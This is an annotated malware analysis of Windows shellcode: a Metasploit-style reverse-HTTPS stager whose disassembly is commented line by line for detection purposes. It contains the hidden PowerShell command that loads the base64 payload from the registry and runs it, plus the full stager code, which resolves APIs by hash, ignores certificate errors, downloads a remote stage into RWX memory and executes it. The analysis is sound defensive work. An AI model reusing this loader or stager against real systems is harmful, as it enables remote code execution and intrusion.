; shellcode found on Windows host. Payload was stored in the registry. Powershell | |
; was used to extract it from the registry and execute it: | |
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \ | |
; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \ | |
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d" | |
; The following references were used to help comment the shellcode | |
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm | |
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/ | |
;
; Analyst notes (review):
; - Layout, as read from the listing below: a 32-bit x86 hash-based API resolver at
;   0x80006-0x8008e, followed by a WinINet reverse-HTTPS stager (LoadLibraryA -> InternetOpenA
;   -> InternetConnectA -> HttpOpenRequestA -> InternetSetOptionA -> HttpSendRequestA ->
;   VirtualAlloc -> InternetReadFile loop -> ret into the downloaded buffer). It matches the
;   Metasploit block referenced above.
; - Every "call ebp" is a call into the resolver: the API arguments are pushed first, then a
;   dword hash of (module name, export name); the resolver jumps to the export with the
;   caller's arguments still on the stack, so the API returns straight to the "call ebp" site.
; - Artifacts visible in this listing that are useful for detection: the User-Agent string at
;   0x800a7, TCP port 443 (0x1bb), request/security flags that disable certificate validation
;   (0x84a03200 and 0x3380), a 4 MiB PAGE_EXECUTE_READWRITE allocation that is then executed,
;   and the PowerShell command line above (SysWOW64 = 32-bit process, which this code requires).
; - Operand-less instructions are printed with the mnemonic twice ("cld cld", "ret ret",
;   "das das"); this appears to be a listing artifact, not a second instruction.
; - 0x801d5-0x801e2 is data plus a short stub mis-decoded as instructions (linear sweep);
;   see the note at that address.
; Entry: cld clears DF so lodsb walks forward. The call pushes 0x80006 (the resolver start)
; as its return address and lands on the "pop ebp" at 0x8008f.
0x00080000: cld cld | |
0x00080001: call 0x8008f | |
; ---- API resolver (Metasploit "api_call") -------------------------------------------------
; On entry: [esp] = return address, [esp+4] = hash to find, API arguments above that.
; After pushal (ebp = esp): ebp+0x00..0x1c = saved edi,esi,ebp,esp,ebx,edx,ecx,eax,
; ebp+0x20 = return address, ebp+0x24 = hash argument. Later: [ebp-4] = current module
; entry, [ebp-8] = hash of the current module name.
0x00080006: pushal pushal ; 60 | |
0x00080007: mov ebp, esp ; 89 e5 | |
0x00080009: xor edx, edx ; 31 d2 | |
; Walk the loader's module list: fs:[0x30] = PEB, PEB+0x0c = Ldr,
; Ldr+0x14 = InMemoryOrderModuleList.
0x0008000B: mov edx, dword ptr fs:[edx + 0x30] | |
0x0008000F: mov edx, dword ptr [edx + 0xc] | |
0x00080012: mov edx, dword ptr [edx + 0x14] | |
; next_mod (0x80015): edx = current InMemoryOrder list entry.
; +0x28 = BaseDllName.Buffer (UTF-16), +0x26 = BaseDllName.MaximumLength (byte count,
; used as the loop counter, so the UTF-16 bytes are hashed one byte at a time).
0x00080015: mov esi, dword ptr [edx + 0x28] | |
0x00080018: movzx ecx, word ptr [edx + 0x26] | |
; edi = running hash of the module name
0x0008001C: xor edi, edi | |
; mod_name_loop (0x8001e): eax is zeroed each pass so lodsb leaves a zero-extended byte;
; ASCII 'a'..'z' is upper-cased first, so the module-name hash is case-insensitive.
0x0008001E: xor eax, eax | |
0x00080020: lodsb al, byte ptr [esi] | |
0x00080021: cmp al, 0x61 | |
0x00080023: jl 0x80027 | |
0x00080025: sub al, 0x20 | |
; hash = ror13(hash) + byte
0x00080027: ror edi, 0xd | |
0x0008002A: add edi, eax | |
0x0008002C: loop 0x8001e | |
; Save the module entry ([ebp-4]) and its name hash ([ebp-8]), then locate the export
; directory: +0x10 = DllBase, DllBase+0x3c = e_lfanew, NT headers+0x78 = export dir RVA.
0x0008002E: push edx | |
0x0008002F: push edi | |
0x00080030: mov edx, dword ptr [edx + 0x10] | |
0x00080033: mov eax, dword ptr [edx + 0x3c] | |
0x00080036: add eax, edx | |
0x00080038: mov eax, dword ptr [eax + 0x78] | |
0x0008003B: test eax, eax | |
; No export table: skip to 0x80089 (next module; note eax was not pushed on this path).
0x0008003D: je 0x80089 | |
; eax = IMAGE_EXPORT_DIRECTORY (kept on the stack), ecx = NumberOfNames (+0x18),
; ebx = AddressOfNames (+0x20) as a VA.
0x0008003F: add eax, edx | |
0x00080041: push eax | |
0x00080042: mov ecx, dword ptr [eax + 0x18] | |
0x00080045: mov ebx, dword ptr [eax + 0x20] | |
0x00080048: add ebx, edx | |
; get_next_func (0x8004a): iterate the export names from the last down to the first;
; ecx == 0 means every name was checked and the export is not in this module.
0x0008004A: jecxz 0x80088 | |
0x0008004C: dec ecx | |
0x0008004D: mov esi, dword ptr [ebx + ecx*4] | |
0x00080050: add esi, edx | |
0x00080052: xor edi, edi | |
0x00080054: xor eax, eax | |
; Hash the ASCII export name including its terminating NUL. lodsb writes only al, so
; ah stays 0 and "cmp al, ah" is the end-of-string test.
0x00080056: lodsb al, byte ptr [esi] | |
0x00080057: ror edi, 0xd | |
0x0008005A: add edi, eax | |
0x0008005C: cmp al, ah | |
0x0008005E: jne 0x80054 | |
; Combined hash = module-name hash + export-name hash; compare with the requested hash.
0x00080060: add edi, dword ptr [ebp - 8] | |
0x00080063: cmp edi, dword ptr [ebp + 0x24] | |
0x00080066: jne 0x8004a | |
; Found. ecx = name index -> ordinal (AddressOfNameOrdinals, +0x24) -> VA
; (AddressOfFunctions, +0x1c). "mov cx" is a 16-bit write; it relies on ecx < 0x10000.
0x00080068: pop eax | |
0x00080069: mov ebx, dword ptr [eax + 0x24] | |
0x0008006C: add ebx, edx | |
0x0008006E: mov cx, word ptr [ebx + ecx*2] | |
0x00080072: mov ebx, dword ptr [eax + 0x1c] | |
0x00080075: add ebx, edx | |
0x00080077: mov eax, dword ptr [ebx + ecx*4] | |
0x0008007A: add eax, edx | |
; esp = ebp-8 here, so [esp+0x24] = [ebp+0x1c] = the saved-eax slot of the pushal frame:
; popal will therefore return the resolved address in eax. The two pops discard the saved
; module hash and module entry.
0x0008007C: mov dword ptr [esp + 0x24], eax | |
0x00080080: pop ebx ; 5b | |
0x00080081: pop ebx ; 5b | |
0x00080082: popal popal ; 61 | |
; Remove the hash argument while keeping the caller's return address on top, then
; tail-jump into the API; it returns directly to the instruction after "call ebp".
0x00080083: pop ecx ; 59 | |
0x00080084: pop edx ; 5a | |
0x00080085: push ecx ; 51 | |
0x00080086: jmp eax ; ff e0 | |
; Not found in this module: drop the export directory pointer, restore edi/edx and
; advance to the next entry (Flink) of InMemoryOrderModuleList.
0x00080088: pop eax ; 58 | |
0x00080089: pop edi | |
0x0008008A: pop edx | |
0x0008008B: mov edx, dword ptr [edx] | |
0x0008008D: jmp 0x80015 | |
; Reached from the call at 0x80001: ebp = 0x80006 (resolver address) for all later "call ebp".
0x0008008F: pop ebp | |
; ---- stager ------------------------------------------------------------------------------
; load wininet | |
0x00080090: push 0x74656e ; Push the bytes 'wininet',0 onto the stack. | |
0x00080095: push 0x696e6977 ; ... | |
0x0008009A: push esp ; Push a pointer to the "wininet" string on the stack. | |
0x0008009B: push 0x726774c ; hash( "kernel32.dll", "LoadLibraryA" ) | |
0x000800A0: call ebp ; LoadLibraryA( "wininet" ) | |
; The call below pushes 0x800a7 as its return address; 0x800a7..0x80126 holds the User-Agent
; string (not disassembled here), so the callee receives a pointer to it. Bytes 0x80127..0x8012b
; are also absent from the listing; given the pushes at 0x8012c-0x8012e they presumably pop
; that pointer into ecx, zero edi and push the remaining two NULL arguments (dwFlags,
; lpszProxyBypass). If edi is 0 there, dwAccessType = 0 (INTERNET_OPEN_TYPE_PRECONFIG) and
; lpszProxy = NULL - verify against the raw bytes.
0x000800A2: call 0x80127 | |
; user agent string - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; ASU2JS) | |
; INTERNETAPI_(HINTERNET) InternetOpenA( | |
; LPCSTR lpszAgent, | |
; DWORD dwAccessType, | |
; LPCSTR lpszProxy, | |
; LPCSTR lpszProxyBypass, | |
; DWORD dwFlags); | |
0x0008012C: push edi | |
0x0008012D: push edi | |
0x0008012E: push ecx | |
0x0008012F: push 0xa779563a ; hash( "wininet.dll", "InternetOpenA" ) | |
0x00080134: call ebp | |
; eax = hInternet. 0x801ce jumps on to 0x80219, whose "call 0x8013b" pushes 0x8021e
; (the hostname at label url) and enters the InternetConnectA block below.
0x00080136: jmp 0x801ce | |
; void InternetConnectA( | |
; HINTERNET hInternet, | |
; LPCSTR lpszServerName, | |
; INTERNET_PORT nServerPort, | |
; LPCSTR lpszUserName, | |
; LPCSTR lpszPassword, | |
; DWORD dwService, | |
; DWORD dwFlags, | |
; DWORD_PTR dwContext); | |
0x0008013B: pop ebx ; pop URL (hostname), store in ebx | |
0x0008013C: xor ecx, ecx ; NULL | |
0x0008013E: push ecx ; DWORD_PTR dwContext (NULL) | |
0x0008013F: push ecx ; dwFlags (NULL) | |
0x00080140: push 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) | |
0x00080142: push ecx ; password (NULL) | |
0x00080143: push ecx ; username (NULL) | |
0x00080144: push 0x1bb ; port 443 | |
0x00080149: push ebx ; hostname | |
0x0008014A: push eax ; HINTERNET hInternet | |
0x0008014B: push 0xc69f8957 ; hash( "wininet.dll", "InternetConnectA" ) | |
0x00080150: call ebp | |
0x00080152: mov ebx, eax ; save hConnect (InternetConnectA result); reused by the retry path at 0x801c6 | |
; 0x801d0 is "call 0x80156": it pushes 0x801d5 (the URI string) and enters the
; HttpOpenRequestA block with that pointer on top of the stack.
0x00080154: jmp 0x801d0 | |
; INTERNETAPI_(HINTERNET) HttpOpenRequestA( | |
; HINTERNET hConnect, | |
; LPCSTR lpszVerb, | |
; LPCSTR lpszObjectName, | |
; LPCSTR lpszVersion, | |
; LPCSTR lpszReferrer, | |
; LPCSTR *lplpszAcceptTypes, | |
; DWORD dwFlags, | |
; DWORD_PTR dwContext); | |
; ecx = pointer to the URI string pushed by the call at 0x801d0
0x00080156: pop ecx | |
0x00080157: xor edx, edx ; NULL | |
0x00080159: push edx ; dwContext (NULL) | |
0x0008015A: push 0x84a03200 ; ( 0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags | |
; 0x80000000 | ; INTERNET_FLAG_RELOAD | |
; 0x04000000 | ; INTERNET_FLAG_NO_CACHE_WRITE | |
; 0x00800000 | ; INTERNET_FLAG_SECURE | |
; 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT | |
; 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID | |
; 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | |
; 0x00000200 ; INTERNET_FLAG_NO_UI | |
0x0008015F: push edx ; accept types (NULL) | |
0x00080160: push edx ; referrer (NULL) | |
0x00080161: push edx ; version (NULL) | |
0x00080162: push ecx ; lpszObjectName (URI string at 0x801d5) | |
0x00080163: push edx ; lpszVerb (NULL -> WinINet default "GET") | |
0x00080164: push eax ; hConnect | |
0x00080165: push 0x3b2e55eb ; hash( "wininet.dll", "HttpOpenRequestA" ) | |
0x0008016A: call ebp | |
0x0008016C: mov esi, eax ; hHttpRequest | |
; BOOLAPI InternetSetOptionA( | |
; HINTERNET hInternet, | |
; DWORD dwOption, | |
; LPVOID lpBuffer, | |
; DWORD dwBufferLength); | |
; The flags dword is pushed and then addressed in place (lpBuffer = esp); it is never
; popped, so it stays on the stack.
0x0008016E: push 0x3380 ; 0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | |
; 0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID | |
; 0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE | |
; 0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA | |
; 0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION | |
0x00080173: mov eax, esp ; eax = &dwFlags (the dword just pushed) | |
0x00080175: push 4 ; sizeof(dwFlags) | |
0x00080177: push eax ; &dwFlags | |
0x00080178: push 0x1f ; DWORD dwOption (31 = INTERNET_OPTION_SECURITY_FLAGS) | |
0x0008017A: push esi ; hRequest | |
0x0008017B: push 0x869e4675 ; hash( "wininet.dll", "InternetSetOptionA" ) | |
0x00080180: call ebp | |
; BOOLAPI HttpSendRequestA( | |
; HINTERNET hRequest, | |
; LPCSTR lpszHeaders, | |
; DWORD dwHeadersLength, | |
; LPVOID lpOptional, | |
; DWORD dwOptionalLength); | |
0x00080182: xor edi, edi ; NULL | |
0x00080184: push edi ; optional length | |
0x00080185: push edi ; optional | |
0x00080186: push edi ; dwHeadersLength | |
0x00080187: push edi ; headers | |
0x00080188: push esi ; hHttpRequest | |
0x00080189: push 0x7b18062d ; hash( "wininet.dll", "HttpSendRequestA" ) | |
0x0008018E: call ebp | |
0x00080190: test eax, eax ; test for failure | |
; Failure target 0x801dc is the stub mis-decoded at 0x801db-0x801e2 below (one final
; "push hash; call ebp"); see the note there.
0x00080192: je 0x801dc | |
; Request sent. As in the proxy-aware Metasploit stager, ask InternetErrorDlg whether the
; request has to be re-issued (e.g. proxy authentication): dwError = 0 when hRequest is
; non-NULL, otherwise GetLastError(); dwFlags = 7 = FLAGS_ERROR_UI_FILTER_FOR_ERRORS |
; FLAGS_ERROR_UI_FLAGS_CHANGE_OPTIONS | FLAGS_ERROR_UI_FLAGS_GENERATE_DATA.
0x00080194: xor edi, edi | |
0x00080196: test esi, esi | |
0x00080198: je 0x8019e | |
0x0008019A: mov ecx, edi | |
0x0008019C: jmp 0x801a7 | |
0x0008019E: push 0x5de2c5aa ; hash( "kernel32.dll", "GetLastError" ) | |
0x000801A3: call ebp | |
0x000801A5: mov ecx, eax | |
0x000801A7: push 0x315e2145 ; hash( "user32.dll", "GetDesktopWindow" ) | |
0x000801AC: call ebp | |
; InternetErrorDlg( hWnd = eax, hRequest = esi, dwError = ecx, dwFlags = 7, lppvData = NULL )
0x000801AE: xor edi, edi | |
0x000801B0: push edi | |
0x000801B1: push 7 | |
0x000801B3: push ecx | |
0x000801B4: push esi | |
0x000801B5: push eax | |
0x000801B6: push 0xbe057b7 ; hash( "wininet.dll", "InternetErrorDlg" ) | |
0x000801BB: call ebp | |
; ERROR_INTERNET_FORCE_RETRY (12032 = 0x2f00): re-issue the request - eax = hConnect (saved in
; ebx), 0x80154 -> 0x801d0 -> HttpOpenRequestA again. Any other result: edi = 0 (this is the
; NULL lpAddress used by VirtualAlloc) and continue at 0x801e3.
0x000801BD: mov edi, 0x2f00 | |
0x000801C2: cmp edi, eax | |
0x000801C4: jne 0x801ca | |
0x000801C6: mov eax, ebx | |
0x000801C8: jmp 0x80154 | |
0x000801CA: xor edi, edi | |
0x000801CC: jmp 0x801e3 | |
0x000801CE: jmp 0x80219 | |
; Pushes 0x801d5 (URI string) and enters the HttpOpenRequestA block at 0x80156.
0x000801D0: call 0x80156 | |
; 0x801d5-0x801e2 is NOT the code printed below (linear-sweep artifact). Re-encoding the
; printed instructions gives the bytes 2f 53 66 6f 34 00 | 00 | 68 f0 b5 a2 56 | ff d5, i.e.:
;   0x801d5: "/Sfo4",0        - the URI passed as lpszObjectName (a network IoC)
;   0x801db: 00               - one extra NUL (purpose not evident from the listing)
;   0x801dc: push 0x56a2b5f0 ; call ebp
;            - the target of both "je 0x801dc" branches (0x80192, 0x8020d): a single final
;              API call with nothing after it, consistent with ExitProcess (Metasploit's
;              hash for kernel32!ExitProcess) - confirm against the hash list referenced above.
; Verify all of the above against the raw bytes before relying on it.
0x000801D5: das das | |
0x000801D6: push ebx | |
0x000801D7: outsw dx, word ptr [esi] | |
0x000801D9: xor al, 0 | |
0x000801DB: add byte ptr [eax - 0x10], ch | |
0x000801DE: mov ch, 0xa2 | |
0x000801E0: push esi | |
0x000801E1: call ebp | |
; VirtualAlloc( NULL, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); edi = 0 here via 0x801ca.
; A 4 MiB private RWX allocation that is subsequently executed is a strong memory-scan indicator.
0x000801E3: push 0x40 ; PAGE_EXECUTE_READWRITE | |
0x000801E5: push 0x1000 ; MEM_COMMIT | |
0x000801EA: push 0x400000 ; dwSize = 0x400000 = 4 MiB stage buffer (the Metasploit source comments it as "8Mb") | |
0x000801EF: push edi ; NULL | |
0x000801F0: push 0xe553a458 ; hash( "kernel32.dll", "VirtualAlloc" ) | |
0x000801F5: call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); | |
; ebx = buffer (eax receives the old ebx, hConnect, which is no longer needed). Two copies
; are pushed: the lower one is the bytesRead scratch slot (edi = its address); the upper one
; is the buffer start that the "ret" at 0x80218 jumps to.
0x000801F7: xchg eax, ebx | |
0x000801F8: push ebx | |
0x000801F9: push ebx | |
0x000801FA: mov edi, esp | |
; download_loop (0x801fc): InternetReadFile( hRequest, buffer, 0x2000, &bytesRead ),
; advancing ebx by the bytes received until a read returns 0 bytes.
0x000801FC: push edi ; &bytesRead | |
0x000801FD: push 0x2000 ; read length | |
0x00080202: push ebx ; buffer | |
0x00080203: push esi ; hRequest | |
0x00080204: push 0xe2899612 ; hash( "wininet.dll", "InternetReadFile" ) | |
0x00080209: call ebp | |
0x0008020B: test eax, eax ; InternetReadFile returned FALSE? | |
0x0008020D: je 0x801dc ; yes: failure stub at 0x801dc (see note above) | |
0x0008020F: mov eax, dword ptr [edi] | |
0x00080211: add ebx, eax ; buffer += bytes_received | |
0x00080213: test eax, eax ; 0 bytes read = end of response | |
0x00080215: jne 0x801fc ; otherwise read the next chunk | |
0x00080217: pop eax ; discard the bytesRead slot | |
0x00080218: ret ret ; "return" to the stored buffer start: executes the downloaded stage in place | |
; Reached from 0x801ce: pushes 0x8021e (label url) as the hostname pointer and enters
; the InternetConnectA block at 0x8013b.
0x00080219: call 0x8013b ; InternetConnectA | |
url:
; 0x0008021E: 61 | |
; url foobar.com (hostname string; the first byte shown, 0x61 = 'a', does not match 'f', so this name looks like a placeholder - check the raw bytes) |